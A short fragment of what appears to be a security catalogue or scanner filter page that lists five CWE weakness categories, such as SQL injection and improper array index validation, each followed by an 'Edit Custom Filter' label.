CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Edit Custom Filter

CWE-129: Improper Validation of Array Index

Edit Custom Filter

CWE-681: Incorrect Conversion between Numeric Types

Edit Custom Filter

CWE-704: Incorrect Type Conversion or Cast

Edit Custom Filter

CWE-1051: Initialization with Hard-Coded Network Resource Configuration Data